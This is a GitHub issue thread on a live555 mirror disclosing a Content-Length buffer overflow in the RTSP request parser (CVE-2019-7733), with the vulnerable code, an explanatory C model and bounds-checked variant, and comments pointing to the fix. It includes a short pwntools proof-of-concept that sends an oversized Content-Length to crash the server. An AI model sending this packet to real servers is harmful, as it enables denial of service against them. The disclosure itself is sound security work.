rgaufman / live555

A mirror of the live555 source code.
GNU Lesser General Public License v3.0

There is a buffer overflow which can lead to dos in live555 v0.95 #21

Open zounathan opened 5 years ago

zounathan commented 5 years ago

When parsing the request packet in the function handleRequestBytes, the code doesn't check the content-length, and uses it in memmove. Finally this causes the buffer overflow.

    unsigned requestSize = (fLastCRLF+4-fRequestBuffer) + contentLength;
    numBytesRemaining = fRequestBytesAlreadySeen - requestSize;
    resetRequestBuffer(); // to prepare for any subsequent request

    if (numBytesRemaining > 0) {
      memmove(fRequestBuffer, &fRequestBuffer[requestSize], numBytesRemaining);
      newBytesRead = numBytesRemaining;
    }

There is a content-length check, but it only assigns parseSucceeded to false. This can't avoid the memmove.

    Boolean parseSucceeded = parseRTSPRequestString((char*)fRequestBuffer, fLastCRLF+2 - fRequestBuffer,
                                                    cmdName, sizeof cmdName,
                                                    urlPreSuffix, sizeof urlPreSuffix,
                                                    urlSuffix, sizeof urlSuffix,
                                                    cseq, sizeof cseq,
                                                    sessionIdStr, sizeof sessionIdStr,
                                                    contentLength);
    fLastCRLF[2] = '\r'; // restore its value
    // Check first for a bogus "Content-Length" value that would cause a pointer wraparound:
    if (tmpPtr + 2 + contentLength < tmpPtr + 2) {
    #ifdef DEBUG
      fprintf(stderr, "parseRTSPRequestString() returned a bogus \"Content-Length:\" value: 0x%x (%d)\n", contentLength, (int)contentLength);
    #endif
      parseSucceeded = False;
    }

I can make the server crash with a simple packet.

    from pwn import *
    p1 = remote("IP", Port)

    pl = "OPTIONS rtsp://10.113.214.93:8554/a.mkv RTSP/1.0\r\nCSeq: 1 \r\nUser-Agent: Lavf55.37.102\r\n"
    pl += "Content-Length: 4294927296\r\n\r\n"
    p1.send(pl)

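The arithmetic described in this report, as an added example in C that is not code from live555 or from the reporter: `REQUEST_BUFFER_SIZE`, `req_state` and the function names are assumptions, and the hardened variant is an illustration of the missing bound, not the project's actual fix.

```c
#include <stdbool.h>
#include <string.h>

#define REQUEST_BUFFER_SIZE 20000u  /* assumed for this example, not the project's constant */

/* Minimal stand-in for the parser state named in the report. */
typedef struct {
    unsigned char buf[REQUEST_BUFFER_SIZE];
    unsigned bytesSeen;  /* fRequestBytesAlreadySeen */
    unsigned headerEnd;  /* offset of fLastCRLF + 4, the first body byte */
} req_state;

/* Same 32-bit unsigned arithmetic as the reported code; only decides whether
   memmove(buf, &buf[requestSize], numBytesRemaining) would read past the bytes received. */
bool unchecked_memmove_is_oob(const req_state *s, unsigned contentLength) {
    unsigned requestSize = s->headerEnd + contentLength;      /* may wrap */
    unsigned numBytesRemaining = s->bytesSeen - requestSize;  /* wraps when requestSize > bytesSeen */
    return numBytesRemaining > 0 && requestSize > s->bytesSeen;
}

/* Hardened variant (added here, not the project's fix): bound contentLength by the body bytes
   actually received before any offset is computed. Returns the bytes carried over to the
   front of the buffer, or -1 when the caller must wait for more data or reject the request. */
int shift_remaining_checked(req_state *s, unsigned contentLength) {
    if (s->headerEnd > s->bytesSeen) return -1;
    if (contentLength > s->bytesSeen - s->headerEnd) return -1;
    unsigned requestSize = s->headerEnd + contentLength;      /* <= bytesSeen, cannot wrap */
    unsigned numBytesRemaining = s->bytesSeen - requestSize;
    if (numBytesRemaining > 0)
        memmove(s->buf, &s->buf[requestSize], numBytesRemaining);
    s->bytesSeen = numBytesRemaining;
    return (int)numBytesRemaining;
}

/* Report's scenario: 100 bytes read (60 of header), Content-Length 4294927296.
   Returns 1 when the unchecked path is out of bounds and the checked path rejects it. */
int demo_report_scenario(void) {
    req_state s = {{0}, 100, 60};
    bool oob = unchecked_memmove_is_oob(&s, 4294927296u);
    return (oob && shift_remaining_checked(&s, 4294927296u) == -1) ? 1 : 0;
}

/* Well-formed request with a 10-byte body and 30 bytes of the next request already read
   (constructed data). Returns the carried-over byte count (30), or -1 on any mismatch. */
int demo_valid_scenario(void) {
    req_state s = {{0}, 100, 60};
    memset(&s.buf[70], 'N', 30);
    if (unchecked_memmove_is_oob(&s, 10)) return -1;
    int carried = shift_remaining_checked(&s, 10);
    return (carried == 30 && s.buf[0] == 'N' && s.buf[29] == 'N') ? carried : -1;
}
```
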
nluedtke commented 5 years ago

This was assigned CVE-2019-7733.

hlef commented 5 years ago

This was addressed in 2019.05.12, please close.

http://www.live555.com/liveMedia/public/changelog.txt

NicoleG25 commented 4 years ago

> This was addressed in 2019.05.12, please close.
>
> http://www.live555.com/liveMedia/public/changelog.txt

Could you kindly point me to the commit that fixed the issue? Thanks :)

hlef commented 4 years ago

> This was addressed in 2019.05.12, please close. http://www.live555.com/liveMedia/public/changelog.txt
>
> Could you kindly point me to the commit that fixed the issue? Thanks :)

@NicoleG25 As far as I recall: ef01f0a7db9d7a7660658d088e36c4c4d0d02e27, this line in particular: https://github.com/rgaufman/live555/blob/master/liveMedia/RTSPServer.cpp#L717.